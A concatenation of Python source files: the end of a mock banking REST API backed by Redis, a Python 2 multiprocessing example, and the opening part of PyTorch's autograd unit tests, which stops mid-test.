"alias": 'Tarjeta de Crédito',
"available_quota": '1500.00',
"court_date": 24
}
lists['credit_cards'].append(credit_card)
data = {
"data": ['ACCOUNTS', 'CREDIT_CARDS'],
"lists": lists
}
queue.put(ujson.dumps(data))
resp = handle_response(request, message, 0, 'Accounts & Credit Cards created!')
else:
resp = handle_response(request, message, 0, "Accounts & Credit Cards already exist!")
else:
resp = handle_response(request, message, 2, "Method Not Allowed")
except Exception as exception:
message['response']['error'] = str(exception.args)
resp = request.Response(json=message)
finally:
return resp
async def clear(request):
global lists
message = dict(response=dict(code=1, message="Something is wrong."))
try:
if request.method == 'GET':
await conn.flushdb()
[v.clear() for k, v in lists.items()]
resp = handle_response(request, message, 0, 'FLUSH DB OK!')
else:
resp = handle_response(request, message, 2, "Method Not Allowed")
except Exception as exception:
message['response']['error'] = str(exception.args)
resp = request.Response(json=message)
finally:
return resp
async def customer_register(request):
global CUSTOMERS
message = dict(response=dict(code=1, message="Sorry, your data is wrong."))
response = ''
try:
if request.method == 'POST':
input_body = request.json
for i in input_body:
user_exist = False
for c in CUSTOMERS:
if c["email"] == i["email"]:
response += "Email %s already exist!" % i['email']
user_exist = True
break
if not user_exist:
response += "".join(
[
i["name"],
' ',
i["last_name"],
" your mail ",
i["email"],
" is registered."
]
)
i["id"] = str(len(CUSTOMERS) + 1)
CUSTOMERS.append(i)
response += " | "
data = {
"data": ['CUSTOMERS'],
"lists": lists
}
queue.put(ujson.dumps(data))
message['response']['code'] = 0
message['response']['message'] = response
return request.Response(json=message)
else:
return handle_response(request, message, 2, "Method Not Allowed")
except Exception as exception:
message['response']['error'] = str(exception.args)
return handle_response(request, message, 1, "Sorry, your data is wrong.")
def credit_cards(request, condition='OR'):
global CREDIT_CARDS
return generic(CREDIT_CARDS, 'Wrong Account Id', request, condition)
def customers(request):
global CUSTOMERS
return generic(CUSTOMERS, 'Client not exist.', request)
def accounts(request):
global ACCOUNTS
return generic(ACCOUNTS, 'Wrong Account Id', request)
def movements(request):
global MOVEMENTS
return generic(MOVEMENTS, 'Wrong Account Id', request)
def transactions(request):
global TRANSACTIONS
return generic(TRANSACTIONS, 'Wrong Transaction Id', request)
def root(request):
with open('./static/index.html') as html_file:
return request.Response(text=html_file.read(), mime_type='text/html')
async def main():
global lists
global conn
global redis_params
try:
# *** Deserialize data from redis *** #
conn = await asyncio_redis.Pool.create(**redis_params)
for k, v in lists.items():
data = await conn.lrange(k, 0, -1)
for i in data:
v.append(ujson.loads(await i))
# *** Create serializer sub-process *** #
p = Process(name='serializer', target=serialize, args=(queue,))
p.start()
print("Process SERIALIZER was created with PID: %s" % str(p.pid))
except Exception as exception:
if exception.args[0] != "This event loop is already running":
print(
"Can't connect to REDIS Server %s PORT %s" %
(redis_params['host'], redis_params['port'])
)
print(exception.args[0])
if __name__ == "__main__":
asyncio.run(main())
rt.add_route('/', root)
rt.add_route('/fill', fill)
rt.add_route('/clear', clear)
rt.add_route('/accounts', accounts)
rt.add_route('/movements', movements)
rt.add_route('/customers', customers)
rt.add_route('/customers/register', customer_register)
rt.add_route('/transactions', transactions)
rt.add_route('/transfers', transfers)
rt.add_route('/credit_cards', credit_cards)
rt.add_route('/credit_cards/statement', credit_cards_statement)
app.run(port=port)
|
multiproc_example.py | """Multiprocessing.
References
----------
http://docs.python.org/library/multiprocessing.html
http://blog.doughellmann.com/2009/04/pymotw-multiprocessing-part-1.html
http://broadcast.oreilly.com/2009/04/pymotw-multiprocessing-part-2.html
"""
# STDLIB
import multiprocessing
import os
# THIRD-PARTY
import numpy as np
# STSCI
from stsci.tools import mputil
def info(title):
out_str = '\n'.join([title, 'module name: ' + __name__])
if hasattr(os, 'getppid'): # only available on Unix
out_str += '\nparent process: {}'.format(os.getppid())
out_str += '\nprocess id: {}'.format(os.getpid())
return out_str
def greet(name):
print info('function greet')
print 'hello', name
def example_1():
print info('main line')
p1 = multiprocessing.Process(target=greet, args=('bob', ))
p2 = multiprocessing.Process(target=greet, args=('jane', ))
p1.start()
p2.start()
p1.join()
p2.join()
def example_2():
print info('main line')
pool_size = multiprocessing.cpu_count()
jobs = [multiprocessing.Process(target=greet, args=(n,))
for n in ('bob', 'jane')]
mputil.launch_and_wait(jobs, pool_size)
def fill_arr(d, i, val):
d[i] = val
def example_3():
pool_size = multiprocessing.cpu_count()
mgr = multiprocessing.Manager()
d = mgr.dict()
jobs = [multiprocessing.Process(target=fill_arr, args=(d, i, i), name=i)
for i in xrange(10)]
mputil.launch_and_wait(jobs, pool_size)
a = np.zeros((20, 10))
for key, val in d.items():
a[:, key] = val
print a
if __name__ == '__main__':
print '****** EXAMPLE 1'
example_1()
print '****** EXAMPLE 2'
example_2()
print '****** EXAMPLE 3'
example_3()
|
test_autograd.py | # Owner(s): ["module: autograd"]
import contextlib
import gc
import io
import math
import os
import random
import sys
import tempfile
import threading
import time
import unittest
import uuid
import warnings
import operator
from copy import deepcopy
from collections import OrderedDict
from itertools import product
from operator import mul
from functools import reduce
import torch
from torch import nn
from torch._six import inf, nan
from torch.autograd.function import once_differentiable
from torch.autograd.profiler import (profile, record_function, emit_nvtx)
from torch.autograd.profiler_util import (_format_time, EventList, FunctionEvent, FunctionEventAvg)
import torch.autograd.functional as autogradF
from torch.utils.checkpoint import checkpoint
from torch.testing import make_tensor
from torch.testing._internal.common_cuda import TEST_CUDA
from torch.testing._internal.common_utils import (TestCase, run_tests, skipIfNoLapack,
slowTest, IS_WINDOWS, IS_MACOS, CudaMemoryLeakCheck,
disable_gc, gradcheck, gradgradcheck,
parametrize, instantiate_parametrized_tests)
from torch.autograd import Variable, Function, detect_anomaly, kineto_available
from torch.autograd.function import InplaceFunction
import torch.autograd.forward_ad as fwAD
from torch.testing._internal.common_methods_invocations import mask_not_all_zeros
from torch.testing._internal.common_device_type import (instantiate_device_type_tests, skipCUDAIfRocm,
onlyCPU, onlyCUDA, dtypes, dtypesIfCUDA,
deviceCountAtLeast, skipMeta)
from torch.testing._internal.common_dtype import get_all_dtypes
from torch.testing._internal.logging_tensor import no_dispatch
import pickle
def graph_desc(fn):
if fn is None:
return 'None'
result = type(fn).__name__ + '('
next_functions = fn.next_functions
for next_fn, _ in next_functions:
result += graph_desc(next_fn)
result += ', '
if next_functions:
result = result[:-2]
return result + ')'
class TestAutograd(TestCase):
def test_tensor_grad_warnings(self):
dummy = torch.empty(1)
with warnings.catch_warnings(record=True) as w:
# Accessing .grad on leaf
dummy.requires_grad_()
foo = dummy.grad
self.assertEqual(len(w), 0)
# Accessing .grad on non-leaf
dummy = dummy.clone()
foo = dummy.grad
self.assertEqual(len(w), 1)
# Accessing .grad on non-leaf that retains gradients
dummy.retain_grad()
foo = dummy.grad
self.assertEqual(len(w), 1)
def _function_test(self, cls):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
result = cls.apply(x, 2, y)
go = torch.ones((), requires_grad=True)
result.sum().backward(go, create_graph=True)
self.assertEqual(x.grad, y + torch.ones(5, 5))
self.assertEqual(y.grad, x + torch.ones(5, 5) * 2)
self.assertIsNotNone(x.grad.grad_fn)
self.assertIsNotNone(y.grad.grad_fn)
return x, y
def test_function(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_tensors
# NOTE: self is the test case here
self.assertIsInstance(var1, torch.Tensor)
self.assertIsInstance(var2, torch.Tensor)
self.assertIsInstance(grad_output, torch.Tensor)
return (grad_output + grad_output * var2, None,
grad_output * ctx.pyscalar + grad_output * var1)
x, y = self._function_test(MyFunction)
x_grad_desc = graph_desc(x.grad.grad_fn)
y_grad_desc = graph_desc(y.grad.grad_fn)
self.assertExpected(x_grad_desc, "x_grad_desc")
self.assertExpected(y_grad_desc, "y_grad_desc")
def test_once_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
self.assertFalse(torch.is_grad_enabled())
t1, t2 = ctx.saved_tensors
return (grad_output + grad_output * t2, None,
grad_output * ctx.pyscalar + grad_output * t1)
x, y = self._function_test(MyFunction)
self.assertEqual(graph_desc(x.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
self.assertEqual(graph_desc(y.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
def test_function_returns_input(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad * 2
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
with torch.no_grad():
v.grad.zero_()
MyFunction.apply(v.clone()).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
def test_function_returns_undefined_tensor(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad):
return None
# Test that undefined tensors returned from custom backward function
# are propagated as undefined and not tensor full of zeroes
x = torch.ones(1, requires_grad=True)
MyFunction.apply(x).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x ** 2).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x).sum().backward()
self.assertIsNone(x.grad)
self.assertIsNone(torch.autograd.grad(MyFunction.apply(x), x, allow_unused=True)[0])
def test_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
self.assertEqual(grad, torch.zeros(1))
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_dont_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
ctx.set_materialize_grads(False)
return x
@staticmethod
def backward(ctx, grad):
self.assertIsNone(grad)
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_legacy_function_deprecation_exception(self):
# Trigger exception
class MyFunction(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
# Check exception occurs
with self.assertRaisesRegex(
RuntimeError,
'Legacy autograd function with non-static forward method is deprecated'):
MyFunction()(torch.randn(3, 4))
class SimulateBackwardError(Function):
@staticmethod
def forward(ctx, input):
return input.clone()
@staticmethod
@once_differentiable
def backward(ctx, input):
raise Exception("Simulate error on backward pass")
def test_custom_function_exception(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
tmp = (t1 + t2) * (t1 + t2)
t3 = TestAutograd.SimulateBackwardError.apply(tmp)
with self.assertRaisesRegex(Exception, "Simulate error on backward pass"):
t3.sum().backward()
def test_custom_function_non_tensor_inputs_outputs(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
# Save scale
ctx.scale = scale
ctx.save_for_backward(t1, t2, t3)
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *grads):
# Verify grads
self.assertEqual(7, len(grads))
self.assertIsNone(grads[0])
self.assertIsNone(grads[2])
self.assertIsNone(grads[3])
self.assertIsNone(grads[5])
scale = ctx.scale
var1, var2, var3 = ctx.saved_tensors
return (
grads[1] * scale + grads[4] * var2 * scale + grads[6],
grads[1] * var3 * scale + grads[4] * var1 * scale,
None,
grads[1] * var2 * scale + grads[4] * scale,
)
t1 = torch.rand(10, dtype=torch.double, requires_grad=True)
t2 = torch.rand(10, dtype=torch.double, requires_grad=True)
t3 = torch.rand(10, dtype=torch.double)
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
# Validate running backward.
torch.autograd.backward([res[1].sum(), res[4].sum(), res[6].sum()])
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
self.assertIsNone(t3.grad)
# Test gradcheck
def foo(t1, t2, t3):
res = MyFunction.apply(t1, t2, scale, t3)
return res[1], res[4], res[6]
gradcheck(foo, (t1, t2, t3))
def test_custom_function_no_tensors(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *args):
return (args[0], args[1], None, args[2])
t1 = random.random()
t2 = random.random()
t3 = random.random()
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
def test_invalid_gradients(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad_output):
return torch.randn(10, dtype=torch.float)
with self.assertRaisesRegex(RuntimeError, 'expected shape'):
input = torch.randn(5, 5, dtype=torch.float, requires_grad=True)
MyFunction.apply(input).sum().backward()
def test_unrelated_inputs(self):
# test to ensure grad(grad)check runs successfully even if there is an
# unrelated (but differentiable) inputs
def my_function(x, y):
return x * x
x = torch.rand(10, dtype=torch.double, requires_grad=True)
y = torch.rand(10, dtype=torch.double, requires_grad=True)
gradcheck(my_function, (x, y))
gradgradcheck(my_function, (x, y))
def test_not_implemented_grad(self):
a = torch.rand(2, requires_grad=True)
# if grad for nextafter ends up being implemented, this should be changed
y = torch.nextafter(a, a).sum()
with self.assertRaisesRegex(
NotImplementedError,
'the derivative for .* is not implemented'):
y.backward()
def test_not_implemented_fwad(self):
x = torch.randn(3)
v = torch.rand(3)
mat = torch.randn(2, 3)
with fwAD.dual_level():
dual_x = fwAD.make_dual(x, v)
err_msg = r"Trying to use forward AD with .* that does not support it"
hint_msg = "Running forward AD for an OP that does not implement it should raise a NotImplementedError"
with self.assertRaisesRegex(NotImplementedError, err_msg, msg=hint_msg):
# if forward AD ends up being implemented for torch.mv, choose a different op
res = torch.mv(mat, dual_x)
def test_accumulate_grad(self):
grad_output = torch.ones(5, 5)
def compute_grad(create_graph):
x = torch.randn(5, 5, requires_grad=True)
y = x + 2
y.backward(grad_output, retain_graph=True)
x_grad = x.grad
x_grad_clone = x.grad.clone()
y.backward(grad_output, create_graph=create_graph)
return x_grad, x_grad_clone
# Accumulate in-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=False)
self.assertEqual(x_grad, x_grad_clone * 2)
# Accumulate out-of-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=True)
self.assertEqual(x_grad, x_grad_clone)
def test_accumulate_grad_tensor_reference(self):
def _test_grad_tensor(params_grad_tensor, backward_grad_tensor, should_preserve_reference, create_graph):
params = torch.tensor([1.5, 1.5]).requires_grad_()
params.grad = params_grad_tensor
grad_saved = params.grad
params.backward(backward_grad_tensor, create_graph=create_graph)
self.assertEqual(id(grad_saved) == id(params.grad), should_preserve_reference)
for create_graph in (False, True):
# Accumulate dense gradient to sparse gradient will change the `params.grad` reference
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.tensor([1.5, 1.5]),
False, # never accumulates in-place
create_graph)
# Accumulate dense gradient to dense gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.tensor([1.5, 1.5]),
torch.tensor([1.5, 1.5]),
not create_graph,
create_graph)
# Accumulate sparse gradient to sparse gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
not create_graph,
create_graph)
def test_accumulate_grad_with_zero_numel_grad(self):
a = torch.rand(4, 0, requires_grad=True)
b = torch.rand(4, 1, requires_grad=True)
c = a + b
assert c.shape == (4, 0)
c.sum().backward()
self.assertEqual(b.grad, torch.zeros(4, 1))
self.assertEqual(a.grad, torch.zeros(4, 0))
def test_hessian_vector(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
with torch.no_grad():
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
grad_sum.backward(torch.ones(2, 2))
x_hv = torch.ones(2, 2) * 5
y_hv = torch.ones(2, 2) * 4
self.assertEqual(x.grad, x_grad + x_hv)
self.assertEqual(y.grad, y_grad + y_hv)
def test_grad(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
x_hv = torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[torch.ones(2, 2)],
inputs=[x], create_graph=True)
expected_x_hv = torch.ones(2, 2) * 5
expected_y_hv = torch.ones(2, 2) * 4
self.assertEqual(x_hv[0], expected_x_hv)
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
# Test that grad_outputs and outputs have the same shape
grad_out = torch.ones(2)
try:
torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[grad_out],
inputs=[x], create_graph=True)
self.assertFail()
except RuntimeError as error:
self.assertEqual(str(error), "Mismatch in shape: grad_output[0] has a shape of "
+ str(grad_out.shape) + " and output[0] has a shape of "
+ str(grad_sum.shape) + ".")
def test_grad_nonleaf(self):
x_init = torch.randn(2, 2, requires_grad=True)
x = x_init
y = torch.randn(2, 2, requires_grad=True)
grad_output = torch.ones(2, 2)
def fn(x):
return x ** 2 + y * x + y ** 2
for _ in range(5):
grad_x, = torch.autograd.grad(
fn(x), x, grad_outputs=grad_output, create_graph=True)
grad_x_expected = 2 * x + y
self.assertIsNone(y.grad)
self.assertIsNone(x.grad)
self.assertEqual(grad_x, grad_x_expected)
x = x + 0.05 * grad_x
val_init = fn(x_init).sum()
val_final = fn(x).sum()
self.assertGreater(val_final, val_init)
x.backward(grad_output)
self.assertIsNotNone(y.grad)
self.assertIsNotNone(x_init.grad)
def test_grad_nonleaf_many_outputs(self):
# This checks an edge case for function callbacks
# We want to capture two grads of a function, but can only
# register a single callback.
x = torch.randn(4, 2, requires_grad=True)
a, b = x.chunk(2)
def hook(*grads):
hook_called[0] = True
hook_called = [False]
x.register_hook(hook)
go = torch.randn(2, 2)
grad_a, grad_b = torch.autograd.grad(
(a + 2 * b), [a, b], grad_outputs=go, create_graph=True)
self.assertEqual(grad_a, go)
self.assertEqual(grad_b, go * 2)
self.assertFalse(hook_called[0])
self.assertIsNone(x.grad)
def test_grad_nonleaf_register_hook(self):
# This checks an edge case for register_hook.
# We want to capture grad of a nonleaf tensor,
# but avoid segfault during backward of other nonleaf tensors
x = torch.randn(5, requires_grad=True)
x_list = x.unbind()
x0 = x_list[0]
hook_results = [None]
def hook(grad):
hook_results[0] = grad
x0.register_hook(hook)
x_list[0].backward()
self.assertEqual(hook_results[0], torch.tensor(1.))
expected_grad = torch.tensor([1., 0, 0, 0, 0])
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[0].grad)
for i in range(1, 5, 1):
x_list[i].backward()
self.assertEqual(hook_results[0], None)
expected_grad[i] = 1.0
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[i].grad)
def test_hook_with_no_name(self):
# Create a hook that do not have a __name__ attribute
class MyHookClass:
def __call__(self, grad):
return grad.clone()
x = torch.randn(5, requires_grad=True).clone()
x.register_hook(MyHookClass())
x.sum().backward()
# Should run fine
def test_sharded_grad(self):
leaves = [torch.zeros(5, 5, requires_grad=True) for _ in range(10)]
intermediates = [l * i + l * l for i, l in enumerate(leaves)]
loss = sum(v * i for i, v in enumerate(intermediates)).sum()
# define a helper for dividing intermediates into groups
def group(l, group_size):
return (l[i:i + group_size] for i in range(0, len(l), group_size))
# Compute the d loss / d intermediates in chunks of shard_size
shard_size = 2
d_intermediates = [d_i for intermediates_batch in group(intermediates, shard_size)
for d_i in torch.autograd.grad(loss, intermediates_batch)]
# Compute rest of backward pass
torch.autograd.backward(intermediates, d_intermediates)
for i, l in enumerate(leaves):
self.assertEqual(l.grad, i * i * (1 + l))
def test_backward_badcalls(self):
x = torch.ones(1)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
x.backward()
def test_grad_badcalls(self):
x = torch.ones(1)
y = x ** 2
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(x, y)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(y, x)
x = torch.ones(1, requires_grad=True)
y = x ** 2
torch.autograd.grad(y, x) # this should succeed now
def test_grad_empty_inputs(self):
x = torch.tensor([1.0], requires_grad=True)
with self.assertRaisesRegex(ValueError, "grad requires non-empty inputs."):
torch.autograd.grad(2 * x, [], grad_outputs=torch.tensor([1.0]))
def test_grad_fn_badcalls(self):
error_regex = 'expected .* arguments, got .* instead'
x = torch.ones(1, requires_grad=True)
y = x ** 2
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn(x.detach(), x.detach()) # too many
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn() # too few
y.grad_fn(x.detach()) # this should succeed
def test_grad_unreachable(self):
x = torch.ones(1, requires_grad=True)
y = torch.ones(1, requires_grad=True)
# Make sure x and y have grad accumulators allocated
z = x * 2
w = y * 2
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_y)
# This is slightly different than the case above, because z doesn't even
# have a grad accumulator allocated.
z = torch.ones(1, requires_grad=True)
grad_x, grad_z = torch.autograd.grad(x * 2, [x, z], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_z)
# allow_unused=False, but grads contains None inside, should throw
with self.assertRaisesRegex(RuntimeError,
"Set allow_unused=True"):
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=False)
def test_grad_unreachable_discovery(self):
# Test that certain nodes are not erroneously executed when an input
# is unreachable. See #39784
class MyFunc(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
self.fail("This node should not be executed!")
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
(gY,) = torch.autograd.grad(x, (y, ), allow_unused=True)
self.assertIsNone(gY)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
z = torch.randn(1, requires_grad=True)
(gY, gZ) = torch.autograd.grad(x + z, (y, z), allow_unused=True)
self.assertIsNone(gY)
self.assertIsNotNone(gZ)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
torch.autograd.backward(x, inputs=(y, )) # allow_unused is implicitly True!
self.assertIsNone(y.grad)
def test_grad_batched_grad(self):
x = torch.randn(2, 2, requires_grad=True)
out = x.clone() # Size([2, 2])
batched_grad = torch.arange(3).expand(2, 2, 3).transpose(0, 2) # Size([3, 2, 2])
grad, = torch.autograd.grad(out, (x,), (batched_grad,), is_grads_batched=True)
self.assertEqual(grad, torch.arange(3).expand(2, 2, 3).transpose(0, 2).to(dtype=grad.dtype))
# Detect shape mismatch
grad_out = torch.ones(2, 2)
with self.assertRaisesRegex(RuntimeError, "If `is_grads_batched=True`, we interpret the first"):
torch.autograd.grad(outputs=out, grad_outputs=(grad_out,), inputs=(x,), is_grads_batched=True)
# Scalar outputs
out = x.sum() # Size([])
batched_grad = torch.arange(3) # Size([3])
grad, = torch.autograd.grad(out, (x,), (batched_grad,), is_grads_batched=True)
self.assertEqual(grad, torch.arange(3).expand(2, 2, 3).transpose(0, 2).to(dtype=grad.dtype))
# We consider scalar and sized-1 to be a mismatch. This is consistent with current non-batched behavior.
grad_out = torch.ones(2).unsqueeze(1)
with self.assertRaisesRegex(RuntimeError, "If `is_grads_batched=True`, we interpret the first"):
torch.autograd.grad(outputs=out, grad_outputs=(grad_out,), inputs=(x,), is_grads_batched=True)
def test_hooks(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
y.requires_grad_(True)
counter = [0]
def bw_hook(inc, grad):
self.assertIsInstance(grad, torch.Tensor)
counter[0] += inc
z = x ** 2 + x * 2 + x * y + y
x.register_hook(lambda *args: bw_hook(0, *args))
test = z.register_hook(lambda *args: bw_hook(1, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 1)
test2 = z.register_hook(lambda *args: bw_hook(2, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 4)
test2.remove()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 5)
def bw_hook_modify(grad):
return grad.mul(2)
test.remove()
z.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(y.grad, (x + 1) * 2)
y.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5))
self.assertEqual(y.grad, (x + 1) * 4)
def test_hooks_cpp(self):
# Tests hooks for autograd function implemented in C++
bn = torch.nn.BatchNorm1d(5, affine=False)
bn.double()
bn.eval()
counter = [0]
def bw_hook(grad):
counter[0] += 1
return grad * 2
x = torch.ones(5, 5, dtype=torch.double, requires_grad=True)
z = bn(x)
z.register_hook(bw_hook)
z.sum().backward()
self.assertEqual(counter[0], 1, msg='bw_hook not called')
self.assertEqual(x.grad, torch.ones(5, 5, dtype=torch.double) * 2, atol=1e-5, rtol=0)
def test_hook_none(self):
# WARNING: this is a test for autograd internals.
# You should never have to use such things in your code.
class NoneGradientFunction(Function):
@staticmethod
def forward(ctx, x, y):
assert ctx.needs_input_grad[0]
assert not ctx.needs_input_grad[1]
return x, y
@staticmethod
def backward(ctx, grad_x, grad_y):
return grad_x, None
was_called = [False]
def hook(grad):
self.assertIsNotNone(grad)
was_called[0] = True
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5)
rx, ry = NoneGradientFunction.apply(x, y)
rx.register_hook(hook)
ry.register_hook(hook)
sum(rx, ry).sum().backward()
self.assertTrue(was_called[0])
def test_retain_grad(self):
input = torch.rand(1, 3, requires_grad=True)
h1 = input * 3
out = (h1 * h1).sum()
# It should be possible to call retain_grad() multiple times
h1.retain_grad()
h1.retain_grad()
# Gradient should be accumulated
out.backward(retain_graph=True)
self.assertEqual(h1 * 2, h1.grad)
out.backward(retain_graph=True)
self.assertEqual(h1 * 4, h1.grad)
with torch.no_grad():
input.grad.zero_()
# It should be a no-op for leaves
input.retain_grad()
input.retain_grad()
out.backward()
self.assertEqual(input * 18, input.grad)
def test_retain_grad_cycle(self):
x = torch.ones(5, 5, requires_grad=True)
def run_test():
y = x * 2
y.retain_grad()
return y / 2, torch._C._WeakTensorRef(y)
z, ref = run_test()
self.assertTrue(ref.expired())
z.sum().backward()
def test_backward(self):
v = torch.randn(5, 5, requires_grad=True)
x = torch.randn(5, 5, requires_grad=True)
y = (torch.rand(5, 5) + 0.1).requires_grad_(True)
z = torch.randn(5, 5, requires_grad=True)
grad_output = torch.randn(5, 5)
v.backward(grad_output)
self.assertEqual(v.grad, grad_output)
a = x + (y * z) + 4 * z ** 2 * x / y
a.backward(grad_output)
x_grad = 4 * z.pow(2) / y + 1
y_grad = z - 4 * x * z.pow(2) / y.pow(2)
z_grad = 8 * x * z / y + y
self.assertEqual(x.grad, x_grad * grad_output)
self.assertEqual(y.grad, y_grad * grad_output)
self.assertEqual(z.grad, z_grad * grad_output)
def test_sparse_mm_backward(self):
size = (3, 3)
sparse = torch.sparse_coo_tensor(size, requires_grad=True)
dense = torch.randn(size, requires_grad=True)
with self.assertRaisesRegex(
RuntimeError,
"The backward pass for this operation requires the 'mat1' tensor to be strided,"):
z = dense.addmm(sparse, dense)
mm_test_cases = [
# a requires grad, a is sparse, b requires grad, b is sparse, error message
(False, True, True, False, None),
(False, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(False, True, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, True, False, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, True, "The backward pass for this operation requires the 'mat2'"),
]
for a_req_grad, a_is_sparse, b_req_grad, b_is_sparse, err_msg in mm_test_cases:
# We should only be testing cases with sparse inputs, and at least one
# input needs to require grad so we can call a backward pass
assert a_is_sparse or b_is_sparse
assert a_req_grad or b_req_grad
a = torch.randn(size, requires_grad=a_req_grad)
if a_is_sparse:
a = a.to_sparse()
b = torch.randn(size, requires_grad=b_req_grad)
